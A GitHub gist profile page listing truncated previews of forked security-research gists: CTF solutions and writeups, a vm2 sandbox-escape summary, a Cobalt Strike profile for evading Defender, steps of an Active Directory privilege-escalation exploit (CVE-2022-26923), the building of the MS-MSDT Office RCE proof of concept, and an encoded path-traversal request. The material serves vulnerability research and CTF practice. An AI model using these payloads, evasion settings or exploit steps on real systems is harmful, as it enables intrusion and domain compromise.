Nick deltaclock

View GitHub Profile
@deltaclock
deltaclock / Dockerfile
Created June 20, 2023 13:34 — forked from alisaesage/Dockerfile
Build v8 x64 on modern Linux
# Build v8 x64 on modern Linux
# Time to run: about 1.2 hrs at 8 GB RAM / 8 cores, Ubuntu 22.04 LTS
# This dockerfile is part of Zero Day Engineering training materials on JavaScript engines internals and vulnerability research
# https://zerodayengineering.com
# @zerodaytraining
FROM ubuntu:bionic
MAINTAINER [email protected]
# -y is required: a non-interactive docker build has no TTY to answer the upgrade prompt
RUN apt-get update && apt-get upgrade -y

Sandbox Escape in [email protected]

Summary

There exists a vulnerability in the source code transformer (exception sanitization logic) of vm2 for versions up to 3.9.15, allowing attackers to bypass handleException() and leak unsanitized host exceptions, which can be used to escape the sandbox and run arbitrary code in the host context.

Proof of Concept

@deltaclock
deltaclock / calc.html
Created February 6, 2023 15:10 — forked from terjanq/calc.html
SekaiCTF 2022 solutions
<html>
<body>
<script>
// clobber document.getElementById and make window.calc.contentWindow undefined
open('https://obligatory-calc.ctf.sekai.team/?expr="<form name=getElementById id=calc>"');
function start(){
var ifr = document.createElement('iframe');
// create sandboxed domain, open challenge page and force its origin to be null
// null origin makes window.token undefined because of the error when accessing document.cookie
@deltaclock
deltaclock / minimal-defender-bypass.profile
Created July 14, 2022 21:19 — forked from tothi/minimal-defender-bypass.profile
Minimal Cobalt Strike C2 Profile for Bypassing Defender
# in addition to the profile, a stage0 loader is also required (default generated payloads are caught by signatures)
# as stage0, remote injecting a thread into a suspended process works
set host_stage "false";
set useragent "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.110 Safari/537.36 Edg/96.0.1054.62";
set sleeptime "10000";
stage {
set allocator "MapViewOfFile";
set name "notevil.dll";
@deltaclock
deltaclock / README.md
Created July 3, 2022 18:11 — forked from terjanq/README.md
Postviewer challenge writeup from GoogleCTF 2022

Postviewer - writeup

Challenge's overview

The rumor tells that adm1n stores their secret split into multiple documents. Can you catch 'em all? https://postviewer-web.2022.ctfcompetition.com

The challenge consisted of a simple page that was entirely client-side, i.e. no backend code was involved. A user can upload any file, which will then be stored locally in indexedDB. They can preview their files either by clicking on the title or by visiting the file's URL, for example https://postviewer-web.2022.ctfcompetition.com/#file-01d6039e3e157ebcbbf6b2f7cb2dc678f3b9214d. The preview of the file is rendered inside a blob created from a data: URL. The rendering occurs by sending the file's contents to the iframe via postMessage({ body, mimeType }, '*')

Additionally, there is a /bot endpoint which lets players send URLs to an xss-bot imitating another user. The goal is to steal their documents.

@deltaclock
deltaclock / RWDN_writeup.md
Created June 30, 2022 06:37 — forked from wupco/RWDN_writeup.md
realworldctf 2022 - RWDN

Don't you think it is a baby challenge?

Bypass the extension check

Object.keys(req.files).forEach(function(key){
    var filename = req.files[key].name.toLowerCase();
    var position = filename.lastIndexOf('.');
    if (position == -1) {
      return next();
    }
    var ext = filename.substr(position);
@deltaclock
deltaclock / Program.cs
Created June 15, 2022 07:05 — forked from dmchell/Program.cs
Exploit for Active Directory Domain Privilege Escalation (CVE-2022-26923)
// Exploit for Active Directory Domain Privilege Escalation (CVE-2022-26923)
// Author: @domchell - MDSec
// This exploit can be used to update the relevant AD attributes required to enroll in a machine template as any machine in AD using an existing machine account
// Adjusting MS-DS-Machine-Account-Quota is not sufficient to stop this attack :)
// Steps:
// 1. Escalate on any workstation (hint: krbrelayup ftw)
// 2. Execute UpdateMachineAccount.exe as SYSTEM
// 3. Enroll in machine template e.g. (Certify.exe request /ca:"ca.evil.corp\\CA" /template:Computer /machine /subject:CN=dc.evil.corp
// 4. Request a TGT using the certificate e.g. (Rubeus.exe asktgt /user:dc$ /domain:evil.corp /dc:dc.evil.corp /certificate:<base64 cert> /enctype:AES256)
@deltaclock
deltaclock / ms-msdt.MD
Created June 14, 2022 10:28 — forked from tothi/ms-msdt.MD
The MS-MSDT 0-day Office RCE Proof-of-Concept Payload Building Process

MS-MSDT 0-day Office RCE

MS Office docx files may contain external OLE Object references as HTML files. There is an HTML scheme "ms-msdt:" which invokes the msdt diagnostic tool, which is capable of executing arbitrary code (specified in parameters).

The result is a terrifying attack vector for getting RCE through opening malicious docx files (without using macros).

Here are the steps to build a Proof-of-Concept docx:

  1. Open Word (used up-to-date 2019 Pro, 16.0.10386.20017), create a dummy document, insert an (OLE) object (as a Bitmap Image), save it in docx.
@deltaclock
deltaclock / wokplace-ssl-pinning-bypass.md
Created April 22, 2022 08:35 — forked from xdavidhu/wokplace-ssl-pinning-bypass.md
Bypassing SSL Pinning in Facebook/Meta Workplace (Android)

Tested on Workplace for Android version 362.0.0.29.109. This approach might work in other Facebook/Meta applications. Thank you Imre Rad for helping me analyze the binary.

How does it work?

The Workplace Android app uses the Fizz open source TLS-1.3 library to communicate with the backend APIs. This library is written in C++, and is compiled to native code. It is running as a native library attached to the Android app.

The certificate verification is implemented in fizz/client/ClientProtocol.cpp, on line 1944. The easiest way to bypass this check is to patch the if (state.verifier()) { check on line 1942.

EASYPHP

GET /%2561dmin%3Flogin&data=..%252F..%252F..%252F..%252Fflag HTTP/1.1
Host: 124.71.132.232:60080
User-Agent: AG

CandySHOP

leak: